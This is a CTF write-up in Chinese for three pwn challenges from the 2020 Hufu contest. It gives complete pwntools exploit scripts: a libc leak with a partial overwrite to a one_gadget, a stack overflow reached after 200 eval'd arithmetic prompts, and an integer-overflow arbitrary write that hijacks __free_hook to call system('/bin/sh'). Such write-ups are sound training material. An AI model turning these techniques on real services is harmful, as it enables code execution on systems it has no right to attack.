虎符 CTF Pwn 部分 Writeup

April 20, 2020 CTF-Writeup 访问: 65 次

MarksMan

这道题在本地打通了,远程打不通,可能我用的那个one_gg碰撞的难度有点大

赛后看wp,发现one_gadget -l参数可以获取更多的one_gg,然后三个字节写入,我写入的是_dl_fini函数里面的一个地址,在函数退出的时候会执行到

exp:

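from pwn import *
# from LibcSearcher import *

# Writeup script for the "MarksMan" challenge.  Python 2 pwntools: the
# script relies on raw_input() and on str being byte strings further down.
context.log_level = 'debug'

# Run-mode flag: non-zero runs the binary locally, zero connects to the
# remote endpoint.  Upper case so the debug() helper defined further down,
# which reuses the name `debug`, does not shadow it.
DEBUG = 0
file_name = './chall'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
# Endpoint used for the remote run; the alternative kept in the original
# listing's comments was '39.97.210.182' / '10055'.
ip = "node3.buuoj.cn"
port = '27628'

if DEBUG:
    r = process(file_name)
else:
    r = remote(ip, int(port))
# libc image used for symbol offsets, parsed once instead of once per
# branch; opened after the tube so the side-effect order is unchanged.
libc = ELF(libc_name)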

def debug():
    # Attach gdb to the live target, then block on stdin so the debugger
    # can be set up before the script resumes sending input.
    gdb.attach(r)
    raw_input()  # Python 2: returns when Enter is pressed

file = ELF(file_name)  # challenge binary (shadows the Python 2 builtin `file`)

# Short aliases for the tube operations used below; each just forwards to `r`.
def sl(x):
    """sendline(x) on the open tube."""
    return r.sendline(x)

def sd(x):
    """send(x) without a trailing newline."""
    return r.send(x)

def sla(x, y):
    """Wait for delimiter x, then sendline(y)."""
    return r.sendlineafter(x, y)

def rud(x):
    """recvuntil(x) with the delimiter dropped from the result."""
    return r.recvuntil(x, drop=True)

def ru(x):
    """recvuntil(x), delimiter kept in the result."""
    return r.recvuntil(x)

def li(name, x):
    """Log `name:0x...` at info level."""
    return log.info(name + ':' + hex(x))

def ri():
    """Hand the tube over to the user."""
    return r.interactive()
# --- interaction with the target ---
ru("near: ")
# The text after "near: " is the address the target prints.
# NOTE(review): eval() executes whatever the remote side sends as Python;
# int(text, 16) would parse a hex literal without running it.
libc_base = eval(rud("\n"))-libc.symbols['puts']
li("libc_base",libc_base)
# Write target as a libc-relative offset; the writeup says only that it
# worked locally and not against the remote instance.
aa = 0x81df60 + libc_base
# aa = 0x619f60+libc_base
li("aa",aa)
# one_gadget candidate offsets; only one_gg is used below, the others are
# just logged.
one_gg = 0x10a38c+libc_base
li("one_gg:",0x4f2c5+libc_base)
li("one_gg:",0x4f322+libc_base)
li("one_gg:",0x10a38c+libc_base)
ru("shoot!shoot!\n")
sl(str(aa))
ru("biang!")
# Three single-byte answers (Python 2 str, one byte each): the first is a
# literal, the next two are the second and third bytes of one_gg.
sl("\x87")
ru("biang!")
sl(chr((one_gg>>8)&0xff))
ru("biang!")
# debug()
sl(chr((one_gg>>16)&0xff))
# debug()
# sleep(0.5)
# ru("token:")
# sl("icq517119cb398ae74312f50ccd14f5b")
ri()

count

很简单的一个arm pwn,计算一系列算式后,栈溢出,即可获取到shell
exp:

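from pwn import *
# from LibcSearcher import *

# Writeup script for the "count" challenge.  Python 2 pwntools (raw_input(),
# str used as bytes below).
context.log_level = 'debug'

# Run-mode flag: non-zero runs the binary locally, zero connects remotely.
# Upper case so the debug() helper defined further down, which reuses the
# name `debug`, does not shadow it.
DEBUG = 0
file_name = './pwn'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = '39.97.210.182'
port = '40285'

if DEBUG:
    r = process(file_name)
else:
    r = remote(ip, int(port))
# libc image for symbol offsets, parsed once instead of once per branch;
# opened after the tube so the side-effect order is unchanged.
libc = ELF(libc_name)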

def debug():
    # Attach gdb to the live target, then block on stdin so the debugger
    # can be set up before the script resumes sending input.
    gdb.attach(r)
    raw_input()  # Python 2: returns when Enter is pressed


file = ELF(file_name)  # challenge binary (shadows the Python 2 builtin `file`)

# Short aliases for the tube operations used below; each just forwards to `r`.
def sl(x):
    """sendline(x) on the open tube."""
    return r.sendline(x)

def sd(x):
    """send(x) without a trailing newline."""
    return r.send(x)

def sla(x, y):
    """Wait for delimiter x, then sendline(y)."""
    return r.sendlineafter(x, y)

def rud(x):
    """recvuntil(x) with the delimiter dropped from the result."""
    return r.recvuntil(x, drop=True)

def ru(x):
    """recvuntil(x), delimiter kept in the result."""
    return r.recvuntil(x)

def li(name, x):
    """Log `name:0x...` at info level."""
    return log.info(name + ':' + hex(x))

def ri():
    """Hand the tube over to the user."""
    return r.interactive()

# Answer 200 arithmetic prompts, then send the oversized final input.
for x in range(200):
    ru("Math: ")
    # expression text up to " =", exactly as the target printed it
    aaa = rud(" =")
    # NOTE(review): aaa comes straight from the remote side and eval()
    # executes it as Python, so a buggy or hostile server controls this
    # process.  A small parser for the expected "<a> <op> <b>" form would
    # be safer; left as-is because the exact operator set is not shown here.
    bbb = eval(aaa)
    ru("nput answer:")
    sl(str(bbb))
# 0x64 filler bytes followed by an 8-byte little-endian value (p64 returns
# a Python 2 str).
payload = "a"*0x64+p64(0x12235612)
sl(payload)
ru("token:")
sl("icq517119cb398ae74312f50ccd14f5b")
ri()

SecureBox

这道题其实很简单,只不过是libc-2.30的,所以有一些新的特性

分析程序,发现在add模块存在整型溢出,cmp eax, 0FFFh比较上界是和eax比的,而我们输入的是64位的,所以可以伪造一个很大的数字,造成malloc返回0,然后enc的时候,输入任何地址的偏移即可修改,造成任意地址写

泄露地址的话,就是通过申请大于tcache范围的chunk,释放后直接进入unsorted bin,再申请回来即可出现libc地址
exp:

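from pwn import *
import sys

# Writeup script for the "SecureBox" challenge.  Python 2 pwntools: str is
# used as a byte string below (u64(r.recv(6)+"\x00\x00"), chr/ord on p64).
context.log_level = 'debug'

# Run-mode flag, upper case so the debug() helper defined later does not
# shadow it.  The remote endpoint is left blank in the writeup, so only the
# local run (DEBUG = 1) actually works: int('') would raise ValueError.
DEBUG = 1
context.terminal = ['tmux', 'splitw', '-h']
file_name = './chall'
libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
ip = ''
port = ''

if DEBUG:
    r = process(file_name)  # ,env={"LD_PRELOAD":"./libc.so.6"}
else:
    r = remote(ip, int(port))
# libc image for symbol offsets, parsed once instead of once per branch;
# opened after the tube so the side-effect order is unchanged.
libc = ELF(libc_name)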

file = ELF(file_name)  # challenge binary (shadows the Python 2 builtin `file`)

# Short aliases for the tube operations used below; each just forwards to `r`.
def sl(x):
    """sendline(x) on the open tube."""
    return r.sendline(x)

def sd(x):
    """send(x) without a trailing newline."""
    return r.send(x)

def sla(x, y):
    """Wait for delimiter x, then sendline(y)."""
    return r.sendlineafter(x, y)

def rud(x):
    """recvuntil(x) with the delimiter dropped from the result."""
    return r.recvuntil(x, drop=True)

def ru(x):
    """recvuntil(x), delimiter kept in the result."""
    return r.recvuntil(x)

def li(name, x):
    """Log `name:0x...` at info level."""
    return log.info(name + ':' + hex(x))

def ri():
    """Hand the tube over to the user."""
    return r.interactive()
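def change_type(arr):
    """Parse a list of hex digit strings (no 0x prefix) into a list of ints.

    `arr` is the space-split key line printed by the target; empty fields
    left by repeated or trailing separators are skipped.  Each remaining
    field is parsed as base 16.  int(x, 16) replaces the original
    eval("0x" + x): the text is received from the remote side, and eval()
    would execute anything it sent.  Raises ValueError on a non-hex field.
    """
    return [int(x, 16) for x in arr if x != ""]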

def add(chunk_size):
    """Menu option 1: allocate a box of `chunk_size` bytes.

    Returns the key line the target prints after "Key: \n", with the
    trailing newline dropped, as the raw received string.
    """
    sla('5.Exit\n', '1')
    sla('Size: ', str(chunk_size))
    rud("Key: \n")
    return rud("\n")
def delete(index):
    """Menu option 2: free box `index`."""
    sla('5.Exit\n', '2')
    sla('Box ID: ', str(index))
def show(index, O_size, L_size):
    """Menu option 4: print L_size bytes of box `index` starting at offset O_size.

    The target's reply (after "Msg: \n") is left on the tube for the caller.
    """
    sla('5.Exit\n', '4')
    sla('Box ID: ', str(index))
    sla("Offset of msg: ", str(O_size))
    sla("Len of msg: ", str(L_size))
def enc(index, O_size, L_size, value):
    """Menu option 3: write `value` (declared length L_size) into box `index` at offset O_size.

    `value` is sent as-is with sendline; the caller is responsible for
    its encoding and length.
    """
    sla('5.Exit\n', '3')
    sla('Box ID: ', str(index))
    sla('Offset of msg: ', str(O_size))
    sla("Len of msg: ", str(L_size))
    sla("Msg: \n", value)
def debug():
    # Attach gdb to the live process; the window is chosen by
    # context.terminal set at the top of the script.
    gdb.attach(r)

# --- leak ---
# Two 0x500-byte boxes, then free box 0 and allocate again; the writeup
# explains the size is chosen to be above the tcache range so the freed
# chunk goes to the unsorted bin and comes back with libc pointers inside.
key_1 = change_type(add(0x500).split(" ",-1))
key_2 = change_type(add(0x500).split(" ",-1))
delete(0)
key_3 = change_type(add(0x500).split(" ",-1))
show(0,0,8)
ru("Msg: \n")
# Python 2 str concatenation: the 6 received bytes are padded to 8 for u64.
# 0x1eabe0 is the hard-coded distance of the leaked pointer from the libc
# base for the libc this writeup targets (libc-2.30 per the prose); it must
# be re-derived for any other build.
libc_base = u64(r.recv(6)+"\x00\x00")-0x1eabe0
li("libc_base:",libc_base)
free_hook = libc_base + libc.symbols['__free_hook']
li("free_hook:",free_hook)
system_addr = libc_base + libc.symbols['system']
# Oversized size that, per the writeup, passes the 32-bit upper-bound
# check in the add handler; key_3 is rebound to this new box's key.
key_3 = change_type(add(0x7fffffff00000300).split(" ",-1))

# Values are XORed byte-wise with the box key before sending (Python 2:
# p64 returns str, so ord()/chr() work on single characters).  p64() is
# re-evaluated on every iteration; it could be hoisted out of the loop.
enc_system = ""
for x in range(len(p64(system_addr))):
    enc_system+=chr(ord(p64(system_addr)[x])^key_3[x])

enc(2,free_hook,8,enc_system)

binsh_sh = "/bin/sh\x00"
enc_binsh = ""
for x in range(len(binsh_sh)):
    enc_binsh+=chr(ord(binsh_sh[x])^key_2[x])
enc(1,0,8,enc_binsh)

delete(1)
ri()
